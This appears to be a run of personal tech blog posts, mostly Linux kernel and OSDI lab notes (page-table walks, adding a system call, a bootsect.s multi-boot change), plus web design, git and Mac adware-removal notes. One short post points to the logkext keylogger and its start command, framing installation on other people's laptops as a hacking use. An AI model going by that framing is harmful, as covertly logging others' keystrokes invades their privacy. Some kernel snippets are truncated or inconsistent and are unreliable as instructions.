    • vm_start: start virtual address
    • vm_end: end virtual address
    • vm_next: next vm_area_struct in the linked list, NULL if it's the last one


To scan through all the process, and find the one we want:
struct task_struct *task;
for_each_process(task) {

    if( task == NULL )  continue;
    if( task->mm == NULL )  continue;

    if( strcmp(task->comm, "reclim-me")==0 ){

To scan through the virtual memory areas of one mmap:

for( vma=mm->mmap ; vma!=NULL ; vma=vma->vm_next) { ... }

And, in real world, there are several layers for the page table, which means we have to look up one after one, and check if the address exists:

pgd = pgd_offset(mm, address);
if (!pgd_present(*pgd)) continue;

pud = pud_offset(pgd, address);
if (!pud_present(*pud)) continue;

pmd = pmd_offset(pud, address);
if (!pmd_present(*pmd)) continue;

pte = pte_offset_map(pmd, address);

ptl = pte_lockptr(mm, pmd);
if (pte_present(*pte)) {
sum ++;
pte_unmap_unlock(pte, ptl);


Finally, for this OSDI lab, we have to print out the number of frames of a process. To know the current answer, we can:
  • cat /proc/<pid>/statm | awk '{print $2}'
  • get_mm_rss(task->mm)
To get states of virtual memory areas:
  • cat /proc/<pid>/maps
However, we have to implement our own calculation in this lab, and here's the code:

By detecting the number of frames of the program "reclim-me", we learned that kernel gives out the memory only when the process starts to write.


It seems that the TA mistyped "reclaim" into "reclim" which is a meaningless word; however, I follow the original code in my github at this point.


Thursday, April 24, 2014

[OSDI] Major and Minor Number for Device Nodes

As we all know, we operate the devices as a file under linux. And the files are listed under /dev, such as /dev/sda, /dev/ram0, etc. However, in OSDI course, the instructor mentioned that the name, sda, ram0, etc, is only for human to read. And, for the machine, we are having a major and a minor number for each device. How they are converted is as below (it's one-to-one conversion):


Friday, April 18, 2014

Setup Debian VMs on VMWare

To have a better experience on Debian VMs on VMWare, it's always a good idea to install "VMWare-Tool". However, some settings have to be made, and this guy had written them down:

Monday, April 14, 2014

[OSDI] Virtualization v.s. Emulation

Often, I question myself the difference between "Virtualization" and "Emulation". Hopefully, I found a good explanation on the Internet as below:

Difference by Definition

Virtual machines make use of CPU self-virtualization, to whatever extent it exists, to provide a virtualized interface to the real hardware. Emulators emulate hardware without relying on the CPU being able to run code directly and redirect some operations to a hypervisor controlling the virtual container. -- stackoverflow (geekosaur)
It turns out the main difference is whether (part of) the code is directly run on the host machine (virtualization) or on a software-emulating hardware (emulation).

Again, from this website, we learn:

  • Virtualization: involves simulating parts of a computer's hardware
  • Emulation: in emulation the virtual machine simulates the complete hardware in software





Wednesday, April 9, 2014

Fixed, Fluid, Adaptive, and Responsive Website Designs

It's quit often to see these names while developing websites. However, I had no chance to learn deep into these things until today. In my own understanding, these names are mainly focus on the "dynamic width" problem all developers may face while designing the layout.


Website width varies from 800px on small mobile devices to 2560px on expensive Macbook Pro Retina. To have the best user experience, most of the time we should test the website on different devices (screen sizes), and make sure the everything is working well (at least it's under the designer's control).

First, it's always a good idea to start the design on the size that most people are using. We can check the "Screen Resolution Statistics" on here:

Second, we should test the website on different widths. The simplest way is to adjust the width of your browser, like:

Original width:

Decreased width:

Remember that it's okay to let the user scroll up and down (the height of the website is larger then the screen size), but it's a pretty BAD idea to let the user scroll left and right since most of the mouse doesn't have that kind of control button or trackball.

Design Solutions

I can still recall the days in elementary school, my teacher asked me to put "screen resolution of 1024x768 pixels" at the bottom of the website. I think that's because
  • we are not having good CSS/Javascript at that time to solve the dynamic width problems, 
  • users' devices are mostly having the same resolution (1024x768 pixels), 
  • and it's easier.
Now I learned that this kind of website design is called "fixed-width", it's kind of old fashion but classic. And, here, I am listing out all the comman design solutions:


"a set width and resizing the browser or viewing it on different devices won’t affect on the way the website looks." -- teamtreehouse
This is the kind of design I just mentioned, and it's widely used for the traditional websites. Here are some examples:

- Pro: The layout is totally under controlled since the designer doesn't have to care about the screen resolution, but only cares about the selected and fixed width instead.
- Con: It may be hard to read on different size of screens, users have to scroll left and right if the website width is larger than the screen width.


"built using percentages for widths. As a result, columns are relative to one another and the browser allowing it to scale up and down fluidly." -- teamtreehouse
The main point of fluid is that the columns are assigned specific "percentages" of the whole width, which means the columns are having fixed proportions no matter what the screen width is.

- Pro: The website remains almost same designs on different sizes of screens, which is corresponding to the fixed proportions.
- Con: Designs will be destroyed if the screen width is too small. For example, 20% of a 800px mobile screen is 160px, which may not be large enough for displaying the original content. Therefore, it may be a good idea to set the minimum website width (apply "min-width" in CSS).


"introduce media queries to target specific device sizes, like smaller monitors, tablets, and mobile." -- teamtreehouse
Adaptive website designs offer serval layouts based on different types of devices, such as smaller monitors, tablets, and mobiles. Just for example (may not be true in real world practice), they may apply "original layout template" for width over 1024px, "tablets layout template" for width between 600px and 1024px, and "mobile layout template" for width less than 600px. Really good explanation I found is in this website.

* Some people think adaptive designs are as same as responsive designs (which will describe later). I think they are similar and with slight differences.


Smaller Screen:


- Pro: This works pretty fine on most of screens, it's offering different layout templates based on it's type (traditional monitor, tablet, mobile, etc).
- Con: Instead of designing "one" layout, the designer should bring out "several" layouts to reach this purpose.


"built on a fluid grid and use media queries to control the design and its content as it scales down or up with the browser or device." -- teamtreehouse
It's pretty the same as the adaptive design, but it applies the "fluid" design on different templates which are targeting to different types of devices. And, I believe this design offers the best user experience since the designer has to care about every layout for any size of the screen.

- Pro: I think this is the best design for the websites, it cares every layout possibilities for users on any devices.
- Con: It may cost a lots to reach this design, and the code could be complex. More tests should be held to make sure there's no bug.


  • Lots of websites are not supporting mobiles in the same page, but offer any other version instead. It detects the devices you are using, and redirect you to the mobile version one if you're on a mobile device. Example is here: and
  • To detect the screen width (viewport width), we should apply "CSS Media Queries".


I draw the graph as the summary of this post, and please tell me if there's any mistake in the graph. Also, I believe that these designs are just "principles", which means that we don't have to fix to any of them, but wisely use them in different situations.


* thanks Shumin for raising this topic

Keylogger for Mac OS X

For security or hacking purpose, people install keyloggers on their own laptops or on other people's laptops. It's quiet interesting to play around this kind of program.

logkext: (this contains version 2.4 at this point)
However, in its github, there's no compiled packages. The older version 2.3 at Google Code is having compiled packages (

This is  an open source keylogger for Mac, to start the application simply type "sudo logKextClient".

Friday, April 4, 2014

Removing Virus (Mac)

I found that my Chrome is acting weird these days. Strange Ads are popping in lots of websites, and I have no idea how to turn it off. Then, I started to figure out the solution.

Here are some steps may help in most cases, but not in this case:

  • Turn off extensions/plugins, so that there's won't be unwanted js code while loading the websites. => However, the problem remained the same; and different browsers are having the same problem (tested on Chrome and Safari)
  • Clean cookies and other personal settings  => not helping anything
  • Remove everything under "~/Library/Application\ Support/Google/" and "/Library/Application\ Support/Google/", then reinstall Chrome => not helping anything, since the problem happens on different browsers

So, I start to trace the problem on Chrome Developer Tools (Networks):

  1. The right and original request for Google Search.
  2. Chrome is trying to get; however this is the problem.
  3. After getting get-js, Chrome start to run sf_main, and this is loading the Ads
  4. direct.html is the IFREAM for the Ads
The root problem is that "somebody" request the get-js while I am browsing the website. But, I don't know who's the guy.

However, it's easy to block the request by adding into the blacklist:
  • vim /etc/hosts
  • add
Then the get-js request will be blocked:

The Ads are removed now.

Better Solution

Thanks for Niccolò Ventura and Steven Foong handing solutions in the comments of this post, and I am writing them down here for conclusion:
>> sudo rm /Library/LaunchAgents/com.vsearch.agent.plist /Library/LaunchAgents/com.vsearch.daemon.plist /Library/LaunchAgents/com.vsearch.helper.plist Library/Frameworks/VSearch.framework # so the virus won't auto-start when the system is up
>> sudo rm -fr /Library/Application\ Support/VSearch/ # remove the virus

Wednesday, March 26, 2014

[OSDI] Adding a New System Call in Linux Kernel


  1. modify arch/x86/kernel/syscall_table_32.S
  2. modify arch/x86/include/asm/unistd_32.h
  3. modify arch/x86/include/asm/syscalls.h
  4. modify arch/x86/kernel/Makefile
  5. add and implement arch/x86/kernel/hello.c
  6. make && sudo make modules_install && sudo make install && sudo reboot (Compile Kernel)

modify arch/x86/kernel/syscall_table_32.S

this file contains all the syscall names, so add a new line for our new system call at the end of the file
add .long sys_mycall at the end

modify arch/x86/include/asm/unistd_32.h

add #define __NR_mycall 338 before #ifdef __KERNEL__
modify #define NR_syscalls <number of system calls + 1>

modify arch/x86/include/asm/syscalls.h

the interface (declaration) of the system calls
add asm_linkage int mycall(void); after asmlinkage long sys_mmap(...);

modify arch/x86/kernel/Makefile

make sure the new system call will be compiled
add obj-y += mycall.o after obj-y := process...

add and implement arch/x86/kernel/hello.c

#include <linux/kernel.h>
#include <linux/linkage.h>
asmlinkage int sys_mycall(void) {
    printk("Hello, how are you?\n");
    return 0;


  • modify /usr/include/asm/unistd_32.h
  • modify /usr/include/bits/syscall.h
  • write a program to test it
  • see the output in dmesg
modify /usr/include/asm/unistd_32.h
add #define __NR_mycall 341 at the end, before #endif
modify /usr/include/bits/syscall.h
add #define SYS_mycall __NR_mycall at the end of the file
write a program to test it

#include <syscall.h>#include <stdio.h>
int main() {
    int r;
    r = syscall(__NR_mycall);
    printf("return value = %d\n", r);
    return 0;

see the output in dmesg
simply type "dmesg" to check if the output is there


Tuesday, March 25, 2014

[OSDI] Compile Kernel (Commands)

Compile Kernel

  • cp ./.config ./.config.bk
  • cp /boot/config-<tab> ./.config
  • make menuconfig
  • make ###compiling to create a compressed kernel image
  • make modules ###compiling to kernel modules
  • sudo make modules_install ###install kernel modules
  • sudo make install ###install kernel itself


Monday, March 24, 2014

Add a New User with Home and in Sudoer

Ha, I can't memorise this one, so I am taking the note here.
  • sudo useradd -d /home/heron -m heron
  • sudo passwd heron
  • sudo adduser heron sudo
    • (Fedora) gpasswd wheel -a heron
    • (Fedora) visudo -> remove '#' in front of %wheel

Thursday, March 20, 2014

TODO and FIXME List in VIM

Programmers like to leave "TODO" or "FIXME" in comments to remind themselves that there's something unfinished or unsolved. It's not only important for reminding, but also a good way to tell notify the other co-workers: "there's something we need to fix", which is a better way instead of email/IMs.

To setup the "TODO" and "FIXME" list in VIM is slightly simple, just add the following line in ~/.vimrc:
command Todo noautocmd vimgrep /TODO\|FIXME/j ** | cw
Type ":Todo" in VIM to obtain the list in VIM.


GNU Split Screen

Notes for split screen commands

  • ctrl+a shift+\ : create new vertically split window
  • ctrl+a shift+s : create new horizontally split window
  • ctrl+a Tab : move cursor to the other window
  • ctrl+a shift+x : close current window

*Enable vertical split on Mac:
* Meet bug ("pty.c:38:26: fatal error: sys/stropts.h: No such file or directory") on Fedora:

Tuesday, March 18, 2014

[OSDI] Ways for Protecting Shared Data/Process Problems

Ways for protecting shared data/process problems
  1. atomic operation:
    • apply a single variable as a lock, check it before entering critical session
  2. disable interrupt:
    • sometimes it's not necessary
    • costs a lot
  3. interrupt mask
    • device drive interrupt handler
  4. program reentry
  5. disable kernel preemption
  6. spin lock
    • implemented by atomic operation
    • run for loop while it's locked

Wednesday, March 12, 2014

Create New Git Repo

Yep, this should be basic, but I always can't memorise the commands. Here, I am writing them down.

p.s. let's use for example.

On Git Server Side

  • mkdir heron-web.git
  • cd heron-web.git/
  • git init --bare

In My Local Code Directory

  • cd <path-to-the-code>
  • git init
  • vim .gitignore
  • git add -A
  • git commit -a -m "init commit"
  • git remote add original
  • git push -u original master

Clone in Other Place

  • git clone
  • cd heron-web

[OSDI] Modifying bootsect.s on Linux v0.11 for Multi Booting Support

In Linux v0.11, the code for booting is written in X86 Assembly Code. It took me a little while understand the code and put some modification on it for the OSDI assignment.

In the assignment, we have to add a new bootable section in the floppy disk, and boot into that section. This part is described in the assignment document. Then, we have to enable the user to select which section he/she wants to boot, linux v0.11 or our new section (hello.s).

First we print out our custom message by calling "int $0x10", then read the insert key by calling "int $0x16". And, by looking up ASCII table, we check if the inserted code is '1' or '2' to boot the corresponding section.

Write "hello binary image" into Floppy Second Section

Modified tools/ as below, so that we get our hello.s into the second section.
# -- a shell version of build.c for the new bootsect.s & setup.s
# author: falcon <>
# update: 2008-10-10

hello_img=$5    # [OSDI lab2]

# Set the biggest sys_size
# Changes from 0x20000 to 0x30000 by tigercn to avoid oversized code.

# set the default "device" file for root image file
if [ -z "$root_dev" ]; then

# Write bootsect (512 bytes, one sector) to stdout
[ ! -f "$bootsect" ] && echo "there is no bootsect binary file there" && exit -1
dd if=$bootsect bs=512 count=1 of=$IMAGE 2>&1 >/dev/null

# [OSDI lab2] add custom hello program
[ ! -f "$hello_img" ] && echo "there is no hello binary file there" && exit -1
dd if=$hello_img seek=1 bs=512 count=1 of=$IMAGE 2>&1 >/dev/null

# Write setup(4 * 512bytes, four sectors) to stdout
[ ! -f "$setup" ] && echo "there is no setup binary file there" && exit -1
dd if=$setup seek=2 bs=512 count=4 of=$IMAGE 2>&1 >/dev/null

# Write system(< SYS_SIZE) to stdout
[ ! -f "$system" ] && echo "there is no system binary file there" && exit -1
system_size=`wc -c $system |cut -d" " -f1`
[ $system_size -gt $SYS_SIZE ] && echo "the system binary is too big" && exit -1
dd if=$system seek=6 bs=512 count=$((2888-1-4)) of=$IMAGE 2>&1 >/dev/null

# Set "device" for the root image file
echo -ne "\x$DEFAULT_MINOR_ROOT\x$DEFAULT_MAJOR_ROOT" | dd ibs=1 obs=1 count=2 seek=508 of=$IMAGE conv=notrunc  2>&1 >/dev/null

Put Custom "hello.s" Section into the Directory

Yes, put "hello.s" under boot/. However, the hello.s I am using is not my work but the TA's, so it may not a good idea to put the code here.

Modify Makefile

Add the following things in boot/Makefile:
hello: hello.s
    @$(AS) -o hello.o hello.s
    @$(LD) $(LDFLAGS) -o hello hello.o
    @objcopy -R .pdr -R .comment -R.note -S -O binary hello

And, add the following things in ./Makefile:
Image: boot/bootsect boot/setup tools/system boot/hello
    @cp -f tools/system system.tmp
    @strip system.tmp
    @objcopy -O binary -R .note -R .comment system.tmp tools/kernel

    @tools/ boot/bootsect boot/setup tools/kernel Image boot/hello $(ROOT_DEV)
    @rm system.tmp
    @rm tools/kernel -f
boot/hello: boot/hello.s
    @make hello -C boot

Modify bootsect.s

And, here's the code I added in boot/bootsect.s:

# [OSDI lab2]: booting selection here
# print some message first
    mov     $0x03, %ah              # read cursor pos
    xor     %bh, %bh
    int     $0x10
    mov     $24, %cx
    mov     $0x0007, %bx            # page 0, attribute 7 (normal)
    mov     $msg2, %bp
    mov     $0x1301, %ax            # write string, move cursor
    int     $0x10
    mov $0x0000, %ax
    int $0x16
    cmp $0x31, %al
    je load_setup
    cmp $0x32, %al
    je load_hello
    jmp read_key
# you can implement the load hello image code at here
    mov     $0x0000, %dx            # drive 0, head 0
    mov     $0x0002, %cx            # setup now change to sector 3, track 0 [OSDI lab2] editted
    mov     $0x0200, %bx            # address = 512, in INITSEG
    mov $0x0201, %ax                # service 2, nr of sectors
    int     $0x13                       # read it
    jnc     ok_load_hello           # ok - continue
    mov     $0x0000, %dx
    mov     $0x0000, %ax            # reset the diskette
    int     $0x13
    jmp     load_hello
# Get disk drive parameters, specifically nr of sectors/track
    mov     $0x00, %dl
    mov     $0x0800, %ax            # AH=8 is get drive parameters
    int     $0x13
    mov     $0x00, %ch
    mov     %cx, %cs:sectors+0      # %cs means sectors is in %cs, [H]: not understanding
    mov     $SYSSEG, %ax
    mov     %ax, %es                # segment of 0x010000
    call    read_it
    call    kill_motor
# load the setup-sectors directly after the bootblock.
# Note that 'es' is already set up.



* thanks Schwannden Kuo for correcting my English